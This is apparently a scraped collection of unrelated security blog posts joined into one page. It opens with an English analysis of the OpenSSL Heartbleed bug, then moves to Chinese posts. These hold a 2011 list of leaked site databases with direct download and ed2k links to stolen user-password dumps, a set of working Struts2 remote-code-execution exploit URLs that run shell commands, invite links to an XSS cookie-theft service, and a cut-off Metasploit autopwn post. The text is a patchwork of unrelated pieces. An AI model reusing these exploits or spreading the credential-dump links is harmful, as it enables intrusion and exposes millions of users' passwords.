existential type crisis : Diagnosis of the OpenSSL Heartbleed Bug

When I wrote about the GnuTLS bug, I said that this isn’t the last severe TLS stack bug we’d see. I didn’t expect it to be quite this bad, however.

The Heartbleed bug is a particularly nasty bug. It allows an attacker to read up to 64KB of memory, and the security researchers have said:

Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

How could this happen? Let’s read the code and find out.

The bug

The fix starts here, in ssl/d1_both.c:

int            
dtls1_process_heartbeat(SSL *s)
    {          
    unsigned char *p = &s->s3->rrec.data[0], *pl;
    unsigned short hbtype;
    unsigned int payload;
    unsigned int padding = 16; /* Use minimum padding */

So, first we get a pointer to the data within an SSLv3 record. That looks like this:

typedef struct ssl3_record_st
    {
        int type;               /* type of record */
        unsigned int length;    /* How many bytes available */
        unsigned int off;       /* read/write offset into 'buf' */
        unsigned char *data;    /* pointer to the record data */
        unsigned char *input;   /* where the decode bytes are */
        unsigned char *comp;    /* only used with decompression - malloc()ed */
        unsigned long epoch;    /* epoch number, needed by DTLS1 */
        unsigned char seq_num[8]; /* sequence number, needed by DTLS1 */
    } SSL3_RECORD;

Records have a type, a length, and data. Back to dtls1_process_heartbeat:

/* Read type and payload length first */
hbtype = *p++;
n2s(p, payload);
pl = p;

The first byte of the SSLv3 record is the heartbeat type. The macro n2s takes two bytes from p, and puts them in payload. This is actually the length of the payload. Note that the actual length in the SSLv3 record is not checked.

The variable pl is then the resulting heartbeat data, supplied by the requester.

Later in the function, it does this:

unsigned char *buffer, *bp;
int r;

/* Allocate memory for the response, size is 1 byte
 * message type, plus 2 bytes payload length, plus
 * payload, plus padding
 */
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;

So we’re allocating as much memory as the requester asked for: up to 65535+1+2+16, to be precise. The variable bp is going to be the pointer used for accessing this memory. Then:

/* Enter response type, length and copy payload */
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
memcpy(bp, pl, payload);

The macro s2n does the inverse of n2s: it takes a 16-bit value and puts it into two bytes. So it puts the same payload length requested.

Then it copies payload bytes from pl, the user supplied data, to the newly allocated bparray. After this, it sends this all back to the user. So where’s the bug?

The user controls payload and pl

What if the requester didn’t actually supply payload bytes, like she said she did? What if pl really is only one byte? Then the read from memcpy is going to read whatever memory was near the SSLv3 record and within the same process.

And apparently, there’s a lot of stuff nearby.

There are two ways memory is dynamically allocated with malloc (at least on Linux): using sbrk(2) and using mmap(2). If the memory is allocated with sbrk, then it uses the old heap-grows-up rules and limits what can be found with this, although multiple requests (especially simultaneously) could still find some fun stuff1.

The allocations for bp don’t matter at all, actually. The allocation for pl, however, matters a great deal. It’s almost certainly allocated with sbrk because of the mmapthreshold in malloc. However, interesting stuff (like documents or user info), is very likely to be allocated with mmap and might be reachable from pl. Multiple simultaneous requests will also make some interesting data available.

And your secret keys will probably be available:

The fix

The most important part of the fix was this:

/* Read type and payload length first */
if (1 + 2 + 16 > s->s3->rrec.length)
    return 0; /* silently discard */
hbtype = *p++;
n2s(p, payload);
if (1 + 2 + payload + 16 > s->s3->rrec.length)
    return 0; /* silently discard per RFC 6520 sec. 4 */
pl = p;

This does two things: the first check stops zero-length heartbeats. The second check checks to make sure that the actual record length is sufficiently long. That’s it.

Lessons

What can we learn from this?

I’m a fan of C. It was my first programming language and it was the first language I felt comfortable using professionally. But I see its limitations more clearly now than I have ever before.

Between this and the GnuTLS bug, I think that we need to do three things:

  1. Pay money for security audits of critical security infrastructure like OpenSSL
  2. Write lots of unit and integration tests for these libraries
  3. Start writing alternatives in safer languages

Given how difficult it is to write safe C, I don’t see any other options. I would donate to this effort. Would you?


  1. This section originally contained my skepticism about the feasability of a PoC due to the nature of how the heap works via sbrk. Neel Mehta has validated some of my concerns, but there are many reports of secret key discovery out there. 

Sean is a software engineer who is passionate about doing things right. He is currently working on Squadron: an awesome configuration and release management tool for SaaS applications.

泄漏的网站列表

51cto数据库.zip
2008普查地区1.rar
2008普查地区1.zip
caigame_useraccounts赌博.rar
CNbeta数据库.tgz
CNZZ数据库.rar
CSDN数据库.zip
eNet数据库.rar
gg.zip
IS数据库.kz
mail.rar
me.zip
VVV9.rar
TT数据库.zip
爱慕.zip
百合网数据库.zip
多玩库.rar
湖北模特.rar
佳品网.zip
金山毒霸.zip
开心网.rar
美空数据库.zip
世纪家园数据库.zip
天涯数据库.zip
图虫网.zip
西游傲剑.rar
信息学院数据库.rar
珍爱网数据库.zip
走秀网.rar
7k7k2000w.sql
51cto.com.sql
cnzz.com.sql
duowang_800w.sql
facebook_user.sql
jiayuan20110312.sql
meikong.sql
php.com.sql
renren201103.sql
sina20090818.sql
www.csdn.net.sql
yy.com.sql
51CTO20110620.rar
360buy.com20111129.sql
cnbeta.com.sql
Discuz.net20110909.sql
dzh.mop.com.sql
hotmail.com(部分).rar
jiayuan.com20110909.sql
kaixin.com20110401.sql
php.net.rar
renren.com20111111.sql
tianya.com2010.sql
weibo.com20110220.sql
youku.com20080504.rar
zhenai.com_20111103.sql
51job.com.sql
alipay.com20100908.sql
CNZZ.com.sql
douban.com20101222.sql
facebook_mail_20111011.sql
it168.com_user_mail20090808.sql
job.dajie.com.rar
mysql.de.rar
PHPWind20101111.sql
sougou_bbs2011.sql
tudou_VIP_20110103.sql
zhaopin.com.rar

 

2011年12月21日网上突现密码泄露…

12月21日:CSDN 640W用户帐户,密码,邮箱遭到黑客泄露

12月22日:中国各大知名网站全面沦陷….涉及范围甚广,泄露信息涉及用户相关业务甚多….

一场席卷全中国的密码安全问题爆发了….

12月23日:经过确认 CSDN 泄露 多玩 泄露 梦幻西游帐户通过木马泄露 人人网部分泄露

12月23日:网友爆料 天涯沦陷…7K7K包中包含天涯帐户密码!!!

12月24日:178沦陷 UUU9沦陷 事态蔓延…(已通知厂商.)

12月24日 15:30:天涯全面沦陷 泄露多达900W帐户信息…

12月24日 17:00:网易土木在线也沦陷,数据量惊人…

12月25日:百度疑因帐号开放平台泄露帐户信息…

12月25日:北京麒麟网信息科技有限公司疑泄露百度与PPLive帐户与密码.并且自身帐户信息全部泄露…(已通知厂商.)

12月25日:UUU9.COM被黑客两次拖库..(已通知厂商.)

12月25日:网络流传腾讯数据库泄露!!!

12月25日:事态升级天涯疑泄露4000W用户资料

12月25日:178第二次被拖库泄露数据110W条

12月25日:木蚂蚁被爆加密密文用户数据,约13W数据(已通知厂商,厂商已做修复中.)

12月25日 23:32:知名婚恋网站5261302条帐户信息证实…(已通知厂商,厂商已做技术屏蔽.)

12月26日:myspace泄露,迅雷又成功离线3个泄露包!

12月26日 9:47:ispeak泄露帐户信息 已验证!请官方通知会员修改密码!

12月26日 11:36:网络流传包17173.7z中17173.0为178帐户信息,178惨被拖库3次。。。泄露数据200W条

12月26日 11:43:网络流传包17173.7z中17173.3为UUU9.COM帐户信息,泄露数据不详

12月26日 23:17:塞班智能手机网校验准确率高达70%!!或塞班智能手机网沦陷

12月27日 1:44:网易土木论坛通过碰撞分析密码,用户资料全部属实!共计135文件,4.31G 资料泄露时间疑为2011-07-09 15:09:11(已论坛发帖通知,厂商未回应.)

12月27日:178.com彻底沦陷,共计泄露超出1100W+ 数据!

12月27日:766验证泄露,泄露数据十余万!

12月27日:ys168验证泄露,泄露数据三十余万!

12月27日:网络流出新泄露包 金山剑网疑中招,还有更多的泄密资料,究竟还有哪些网站会沦陷?

12月27日:红客联盟疑中招 泄露信息ID都能对应

12月27日:京东商城用户信息泄露

12月27日:凡客 当当 卓越 三大电商沦陷.泄露用户真实信息50W条

12月29日:互联网不再安全,中国IT公司高管联系资料或被泄露!涉及 SONY中国,盛大,网易,百度,Google.腾讯,youku,yahoo,ebay,tom,新蛋,携程,土豆,taobao,sohu,51job,alibaba,智联,中华英才网等将近30多家网络公司!
12月29日:我觉得公安机关等相关部门需要给力,打击这些玷污技术的骇客~这些都是以牺牲个人隐私为主的牟利,站长经常接到某些保险公司,房地产,中介打过来的推销电话,对还有骗子的电话! 现在大家不需要把这些都怪到相关部门(虽然他们还是有一定的责任!),因为我得到一个消息某些骇客主要以这些为生,入侵的都是省级的数据库,具体哪些数据库我想你们都明白!我希望政府能加强安全管理,管理密码不要万年123,abc!!!
12月29日:黑客入侵蒙牛官网,成功拿取服务器权限!20分钟之后服务器关闭!
12月29日:下午将确认某DNS 解析服务是否被入侵泄密!
12月29日:工信部:强烈谴责窃取和泄露用户信息行为
12月29日:Facebook遭遇泄露门:1亿用户资料打包提供下载中国网络不安全,国外的其实也不安全!
12月29日:Taobao疑似泄露帐户信息!一共4个文件SN1-SN4 由于只有消息,暂时无法确认!
12月29日:确认SN1-SN4为SINA用户!!!(帐户为拼凑)
12月29日:DnsPod证实泄露
12月29日:52PK泄露数据120W
12月29日:Ispeak数据泄露上升到1000W
12月29日:网传:当当用户资料数据泄露上升到1200W
12月29日:网传:多家银行资料泄露!传已有网友转帐测试成功!!!

文件名  文件大小  注释
CSDN-中文IT社区-600万.rar  104.85MB
人人网500W_16610.rar  49.56MB
178(1000w)_3087.rar  103.51MB
多玩网_800W.rar  216.91MB
7k7k2000万_2047.rar  194.21MB
嘟嘟牛_66277.rar  205.68MB
weibo.com_12160.rar  49.5 MB  新浪微博weibo.com
天涯数据.kz  377 MB   天涯社区数据库tianya.cn
766_16368.rar  101 MB  766游戏网766.com
766+开心.rar  109 MB  766.com + 开心网 (塞班智能手机网)
1000W+IS2_16436.rar  157 MB  Ispeak_IS语音
aipai_1156.zip  265 MB  爱拍游戏aipai.com
co188_87383 .zip  661 MB  网易土木_co土木在线
mumayi.com数据库.rar  8.14 MB  木蚂蚁mumayi.com
u_766_com_20110519
_2717_11.rar
 4.79 MB  766 Ucenter数据库
17173.7z  409 MB  流传17173.7z中17173.0为178帐户信息,17173.3为UUU9.COM帐户信息
CSDN:共计泄露6428632个帐号 泄漏信息:帐号,明文密码,电子邮件
多玩:共计泄露8305005个帐号 泄漏信息:帐号,MD5加密密码,部分明文密码,电子邮件,多玩昵称
178.COM:共计泄露1883487不断增加 泄漏信息:帐号,MD5加密密码,全部明文密码,电子邮件,178昵称(178账户通用NGA)
天涯:共计泄露9695513个帐号(预计超过4000W数据) 泄漏信息:帐号,明文密码,电子邮件
人人网:共计泄露4768600个帐号 泄漏信息:明文密码,电子邮件
UUU9.COM:共计泄露7513773个帐号 泄漏信息:帐号,MD5加密密码,部分明文密码,电子邮件,U9昵称
网易土木在线:约4.3GB 137个文件 泄漏信息:帐号,邮箱,MD5密码,其他相关数据
梦幻西游:约1.4G(木马盗取) 泄漏信息:帐号,邮箱,明文密码,角色名称,所在服务器,最后登陆时间,最后登陆IP
微博(WEIBO.COM):共计泄露未知个帐号,疑似文件:1 泄漏信息:邮箱,明文密码
北京麒麟网信息科技有限公司:共计泄露9072966个帐号 泄漏信息:帐户,明文密码
知名婚恋网站:共计泄露5261302个帐号 泄漏信息:帐户,明文密码
Ispeak.CN:共计泄露1680271个帐号 泄漏信息:帐户,明文密码,昵称
木蚂蚁:共计泄露13W帐号 泄漏信息:帐户,加密密码,数据库排序ID,其他信息
塞班论坛:共计泄露约140W帐号 泄漏信息:帐户,明文密码,电子邮箱
766.COM:共计泄露约12W帐号 泄漏信息:帐户,md5(md5(pwd).salt)密码,salt,电子邮箱,数据库排序ID

以上来源于http://csdn.aspx2.com/

以下连接来源网络有电驴ed2k://|file|下载链接,或迅雷下载thunder://,或网盘下载,仅供查看确认自己信息研究用。

近段时间密码泄露的收集,内容请与以上泄露时间对号入座,若不齐全,请参阅其它页面。

下载地址已用插件隐藏,回复可见  已失效

CSDN-中文IT社区-600万.rar 盛大网盘下载 电驴地址

多玩网_800W.rar 盛大网盘下载 电驴下载地址

人人网500W_16610.rar:盛大网盘下载 电驴下载地址

嘟嘟牛_66277.rar:盛大网盘下载 电驴下载地址

7k7k2000万_2047.rar:盛大网盘下载 电驴下载地址

178(1000w)_3087.rar:盛大网盘下载 电驴下载地址

以下为直接文件链接,加速可以使用迅雷!
天涯社区_tianya.zip
766_16368.rar
766+kaixin.rar
1000W+IS2_16436.rar
爱拍_aipai_1156.zip
co188_87383.zip
mumayi.com.rar
u_766_com_20110519_2717_11.rar
新浪微博_weibo.com.rar
多玩YY_duowan.rar
7k7k游戏_7k7k.rar
嘟嘟牛_duduniu.rar
CSDN_csdn.rar
人人网_renren.rar
178游戏_178.rar
17173.7z

在泄露的截图中以下部分数据没发现

51cto数据库.zip
cnBeta数据库.tgz
CNZZ数据库.rar
eNet数据库.rar
金山毒霸.zip
开心网.rar
美空数据库.zip
百合网数据库.zip
世纪佳缘数据库.zip
珍爱网数据库.zip
走秀网.rar
51CTO20110620.rar 360buy.com20111129.sql cnbeta.com.sql Discuz.net20110909.sql dzh.mop.com.sql
hotmail.com(部分).rar jiayuan.com20110909.sql kaixin.com20110401.sql php.net.rar
renren.com20111111.sql tianya.com2010.sql weibo.com20110220.sql youku.com20080604.rar
zhenai.com_20111103.sql 51job.com.sql CNZZ.com.sql douban.com20101222.sql
facebook_mail_20111011.sql it168.com_user_mail20090808.sql job.dajie.com.rar
mysql.de.rar PHPWind20101111.sql sougou_bbs2011.sql tudou.com200910.sql xunlei_VIP_20110103.sql
zhaopin.com.rar
alipay.com20100908.sql
当当,凡客,卓越用户资料.zip 当当数据10万条.xlsx 凡客数据测试数据.xls 卓越测试数据20万条.xls
其它页面还有些迅雷thunder://、电驴ed2k://|file|、网盘、bt:torrent的下载

 

本文固定链接: http://www.cutsoul.com/221.html | Cut Your Soul, Let It Be.

Struts2 5个远程代码执行漏洞利用POC

利用代码:
检测是否存在:
POC1:
http://127.0.0.1/Struts2/test.action?(‘\43_memberAccess.allowStaticMethodAccess’)(a)=true&(b)((‘\43context[\’xwork.MethodAccessor.denyMethodExecution\’]\75false’)(b))&(‘\43c’)((‘\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET’)(c))&(d)((‘@java.lang.Thread@sleep(5000)’)(d))

POC2:
http://127.0.0.1/Struts2/test.action?id=’%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000))%2b’

POC3:
http://127.0.0.1/Struts2/hello.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep(5000))(meh%29&z[%28foo%29%28%27meh%27%29]=true

POC4:
http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Thread@sleep(5000))(aa)&x[(class.classLoader.jarPath)(‘aa’)]

POC5(执行了两次所以是10秒):
http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)}

执行CMD命令:
关于回显:webStr\75new\40byte[100] 修改为合适的长度。
POC1:
http://127.0.0.1/Struts2/test.action?(‘\43_memberAccess.allowStaticMethodAccess’)(a)=true&(b)((‘\43context[\’xwork.MethodAccessor.denyMethodExecution\’]\75false’)(b))&(‘\43c’)((‘\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET’)(c))&(g)((‘\43req\75@org.apache.struts2.ServletActionContext@getRequest()’)(d))&(h)((‘\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))’)(d))&(i)((‘\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())’)(d))&(i01)((‘\43webStr\75new\40byte[100]’)(d))&(i1)((‘\43webRootzproreader.readFully(\43webStr)’)(d))&(i111)((‘\43webStr12\75new\40java.lang.String(\43webStr)’)(d))&(i2)((‘\43xman\75@org.apache.struts2.ServletActionContext@getResponse()’)(d))&(i2)((‘\43xman\75@org.apache.struts2.ServletActionContext@getResponse()’)(d))&(i95)((‘\43xman.getWriter().println(\43webStr12)’)(d))&(i99)((‘\43xman.getWriter().close()’)(d))&cmd=cmd%20/c%20ipconfig

POC2:
http://127.0.0.1/Struts2/test.action?id=’%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[100],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))%2b’&cmd=cmd%20/c%20ipconfig

POC3:
http://127.0.0.1/freecms/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)(‘meh’)]=true&cmd=cmd%20/c%20set

POC4:
http://127.0.0.1/Struts2/test.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d=+new+java.lang.Boolean(false),%23_memberAccess%5b%22allowStaticMethodAccess%22%5d=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23a=%40java.lang.Runtime%40getRuntime().exec(%23req.getParameter(%22cmd%22)).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5b50000%5d,%23c.read(%23d),%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23s3cur1ty.println(%23d),%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)(‘aa’)]&cmd=cmd%20/c%20netstat%20-an

POC5:
http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result),%23response.close()}&cmd=cmd%20/c%20set
发几张图证明下:

2013052221372969731.jpg - 大小: 200.8 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2013052221374142822.jpg - 大小: 171.86 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2013052221375064643.jpg - 大小: 175.54 KB - 尺寸:  x  - 点击打开新窗口浏览全图
http://ahack.iteye.com/blog/1858871
http://ahack.iteye.com/blog/1873005

xsser.me邀请码 | xss之cookie收集系统 | xss利用系统

xsser.me  / xsser.cc 登陆入口:

 

www.ieroot.com/xsser/

 

邀请链接:

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

xsser

【转】‍cnzz数据库\人人网\天涯\CNBETA\KU6\u9下载,数据库泄露 密码用户帐号信息

 

 

根据国内某黑客网站透露,绝不仅仅是CSDN的数据库被脱裤泄漏,大量的国内的知名网站如人人网、uuu9.com、多玩YY语音、ENET硅谷动力、百合网、珍爱网、世纪佳缘、金山、开心网、美空、当当网等。

有黑客爆料称,多玩游戏的800万用户,7K7K小游戏的2000万用户、178.com网站的1000万用户资料已经泄露,更有人公布数据包截图,称包括人人网500万、开心网、天涯社区、世纪佳缘、百合网等大批社交网站会成为下一批目标。

黑客公开的截图

截至目前,已经有大量多玩游戏的用户数据被公布在网络。不过,上述传言尚未得到官方证实。

而据一些黑客网站的说法,CSDN数据库泄漏并非没有前兆,一些黑客人士抱怨自己多次向CSDN等国内知名网站上报漏洞没有收到重视,甚至直接被列入黑名单,最后逼得他们公开漏洞或者数据库信息。

翻看一些黑客博客和网站,确实发现上述情况,类似bug和漏洞如XSS、CSRF、SNS蠕虫、URL跳转、后台弱口令、SQL注入、Injection root权限、DNS域传送漏洞、最新溢出漏洞等等皆被提及。甚至包括百度、网易、新浪、腾讯、搜狐、迅雷等大公司。

一些博文和论坛帖子中明显充满了怨气,有黑客曾表示自己向腾讯举报了多个漏洞和bug,虽然被采纳了,但连个QQ公仔都没收到。

另一位黑客则大骂新网,他将漏洞上报新网管理员,过去半年了,对方仍没修复漏洞,甚至将自己加入了邮件黑名单。而他不得已只好把新网的用户信息数据库打包下载做为漏洞证据。。

一名黑客在博文中表示,问题不是出在程序系统出现漏洞,大一点的系统出现漏洞在所难免,而是国内互联网公司普遍的傲慢态度激怒了他们。

国外互联网公司不仅对黑客尊重有加,邀请他们参观公司,招揽他们加入公司,总裁CEO亲自接见,赠送礼品现金,支持他们的活动。为的就是希望这些挑剔敏感的黑客们在发现漏洞后能够首先向公司汇报,尽量减少损失。

国内互联网公司恰恰相反,除了回避问题以外,很多公司甚至报警直接抓捕向他们举报漏洞的黑客,还有的直接在网站上注明公司的法律条文来威慑那些找漏洞的黑客。

逼得黑客们要么偷卖漏洞信息,要么直接公开漏洞,国内互联网公司安全环境急转直下。

闪电博客认为这次CSDN用户密码数据被曝光,是今年甚至是近年来最恶劣的一次国内互联网安全事件,公开600万用户密码直接被大量破解字典收录,互联网再无安全可言。

黑客公开密码的动机令人费解,要是将这600万数据转卖,不仅可以获得收入,还不会造成现在的轰动,之前很多网站的数据在黑客界卖来卖去也不是秘密了。直接公开600万规模的数据,国外恐怕连匿名、LulzSec等黑客组织都没干过。

不禁感叹密码这玩意,你以为是保密的,其实是透明的,以前可能是放在某个QQ群里或者邮件附件里,标上了价钱。现在则直接放到电驴里,免费下载。

请广大程序员朋友们下载后核对信息,如果发现自己的用户名在内,请尽快更改其他帐号的相同密码。

继黑客放出CSDN 600万用户名和密码后,人人网和多玩网也分别被放出500万和800万用户名和密码资料多玩网的800万用户泄漏库里,有大量用户名、明文密码、邮箱、部分加密密码,@猫魅网络安全说经过验证,使用该数据库中的用户名和密码可以正常登录多玩网。
而人人网的被黑数据库用户名和密码大部分都无法登陆,因此还有待验证。

不过这次的数据库被黑事件或许不是这么简单的风波,CSDN和多玩网或许只是冰山一角,网上放出的文件图片(来自@mmc66.com– 猫魅网络安全)显示开心,美空,世纪佳缘,百合等都在其列。

更新:

人人网刚刚进行了回应——如果您的人人网账号密码和CSDN或其他网站一致,建议您马上修改密码,以免账号被盗。人人从上线开始就没有记录明文密码。在CSDN或者其他论坛等使用相同账号密码的用户的人人账号存在风险,请尽快修改。

开心网刚刚进行了回应——鉴于多家网站爆出用户资料被黑客公布的消息,开心网建议广大用户:如果有网站用户名与密码被盗,请及时更改其他网站上的用户名和密码。黑客会用盗来的用户名和密码来探测其他网站,如果用户在不同网站上使用的用户名和密码都相同,一旦泄露一个,其他的也容易被探测出来。

搜狐IT消息 12月22日消息,自昨天有黑客在网上公开提供CSDN网站用户数据库下载后,包括人人网、猫扑、多玩等在内的网站部分用户数据库也被传到网上供用户下载。

国内知名黑客Goodwell对搜狐IT表示,预计泄露网站数据库的行为可能会引发连锁效应,更多网站的数据会被黑客放出。之前这类数据库通过网络地下交易,这些黑客可以取得收益。但由于很多用户的用户名及密码在各网站几乎一样,有黑客将某网站数据库放出后,其他黑客手里的数据库就没有价值。有些黑客出于各种目的,会放出其它网站的数据库,由此引发连锁效应。

Goodwell表示,网站不可能100%安全,对于有技术能力的人,登陆相关网站时,密码并不是唯一的。但是在有黑客放出网站的用户数据库信息后,没有技术能力的人,可能会对网站及其他用户产生很大的破坏性。同时,由于很多用户的用户名和密码大多一致,有可能会被这些人来刷其它网站的库,产生的影响会更大。如果要改变这个局势,网站需要强制所有用户更换他们的密码,并且采取独特的加密方式,以避免用户信息再次被泄露。

据称,很多网站并没有保护用户信息安全的意识,用户的数据信息在数据库里没有任何保护。Goodwell建议相关网站能够加强安全意识,从软硬件多方面强化信息保护。Goodwell对搜狐IT称,最彻底的保护方面,是更改网站静态密码的机制并在MD5基础上使用自己独有的加密函数等方法,同时及时修补系统漏洞。

随着网站及微博实名制规定的陆续出台,如果在实名制的网站出现用户数据泄露事件,将会产生更恶劣的影响。Goodwell表示,在实名制前提下,主管部门及网站应该出台相应的标准及保护机制,以安全地保护用户的隐私。如果在推动实名制而安全保护机制无法跟上的情况下导致信息泄露,会使用户对网站及机构产生信任危机。

Goodwell同时建议用户在上网的时候也要加强自我安全保护意识。在上网时,用户最好根据不同的网站设置不同的密码。为了方便记忆,密码最好根据网站的域名做相应变化。
cnbeta数据库.tgz cnzz数据库.rar CSDN数据库.zip eNet数据库.rar gg.zip IS数据库.kz mail.rar me.zip UUU9.rar YY数据库.zip 爱慕.zip 百合网数据库.zip 多玩库.rar 非诚勿扰.rar 湖北模特.rar 佳品网.zip 金山毒霸.zip 开心网.rar 克洛斯.rar 美空数据库.zip 世纪家园数据库.zip 天涯数据库.zip 图虫网.zip 西游傲剑.rar 信息学院数据库.rar 珍爱网数据库.zip 走秀网.rar

 

最新测试时间:12月24日上午11点48,以下下载地址均有效,回复反映不能下载的请使用旋风下载。这些资源是腾讯服务器上,只能旋风下载。

[hide]CSDN:
http://hz.ftn.qq.com/ftn_handler/70188b37cc9bacd14cc66d14f198e3f3acb37c0c470a4d1ea2b8c5b464e9a30818482bf7c388c9b99ef60b0320effb78aeb11af47e6862e1a02946e9cd41ecd4/CSDN-中文IT社区-600万.rar?&&txf_sid=&&txf_fid=cbb3743788cf6dfaede7caa1d03f302d34af6f74

WEIBO
http://xa.ctfs.ftn.qq.com/ftn_handler/44c125bbafc55fd15d383b2fcf97096eabafaeaca0c587ce3ce1a7dfc627d3043d8f3db2f448b3d0e768b7ccbc562ad8bf3ea63f413feb34c3c4f5c81c9c49d1/weibo.com_12160.rar?&&txf_sid=&&txf_fid=c430dd803ad5a296b4eb6a735cf4d9ff6b3bbe46

多玩
http://hz.ftn.qq.com/ftn_handler/c3a7f9c55d6a30b0d82bb59cd29e1cf5b806236fcfa53ab103d31a351be491d6b0cd02d4d044c1a618b0e77df48369c6c530ad937f7e5cec9ea99fe0eacdccc2/多玩网_800W.rar?&&txf_sid=&&txf_fid=31934dcfe45a53bf1008fb94fd9134dde4424589

7K7K
http://hz.ftn.qq.com/ftn_handler/0dc4e0a4032f7f0e4933ae787d8fb09454f9bb589036802d4fe56536d2f689af8e9cf396cf0178b9f53200280a71c47441d5afe061a051ff1f2b79670a296c8b/7k7k2000万_2047.rar?&&txf_sid=&&txf_fid=6d6eaee20b611db31448728c11e4697bff44c8f8

都都牛
http://hz.ftn.qq.com/ftn_handler/4ef9f4ab11a11f52746af4e318b0304710d9f8f579f80acecdcf101e74fe36c12ef284016785eebc35e1003fc7726d69885ea8351d03de59fc656c5e4111f27d/嘟嘟牛_66277.rar?&&txf_sid=&&txf_fid=72c1a4457272bc78694e369f89fc72f19ae3af39

人人
http://hz.ftn.qq.com/ftn_handler/4963f4036c99c79e809dba076c1d7d5fb0da3b8ea7bd2e9df1682eb90e8b42ecaf5f14d347764ea6171fc521df2d5902d13f0ed20de2ca10ef7f9e91a2dd5218/人人网500W_16610.rar?&&txf_sid=&&txf_fid=d90275d2adfec95c40ed323fd65568c6e94e847b

178

http://xa.ctfs.ftn.qq.com/ftn_handler/fb39ef4b8a38ba395e8d6fcf17bd9ea91a09addfc00537efa5221d1e72f6757a2a90fa25ea92f89e4f1e9449f7769ebdc55d91a4e66d676c68b524435f171bb9/178

 

178这个地址不全下面这个可以。

ed2k://|file|178(1000w)_3087.rar|108534783|FFCD04A52339701C8CB5197BDCF9F4DC|/
ed2k://|file|7k7k2000万_2047.rar|203648704|6EB70910C1C193F5BE04610B503EF4A0|/
ed2k://|file|人人网500W_16610.rar|51969611|8CD19B7A2EB9F1F74CB8BFBDE7BD144D|/
ed2k://|file|嘟嘟牛_66277.rar|215666725|EF7187E33A8EBD9FD806343B7B1CAA82|/
ed2k://|file|多玩网_800W.rar|227441723|F8388A178222518978550D3E64B6129B|/
ed2k://|file|猫1000W_8228.rar|96411648|CE48CD1EA39666AA2B215D1B3028C845|/

 

metasploit db_autopwn & load nessus

Author:bugcx or Anonymous
Url:http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx’s blog | 关注网络安全

(撸一撸)
root@bt:~# msfconsole
  +——————————————————-+
  |  METASPLOIT by Rapid7                                 |
  +—————————+—————————+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |””””””””””””|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
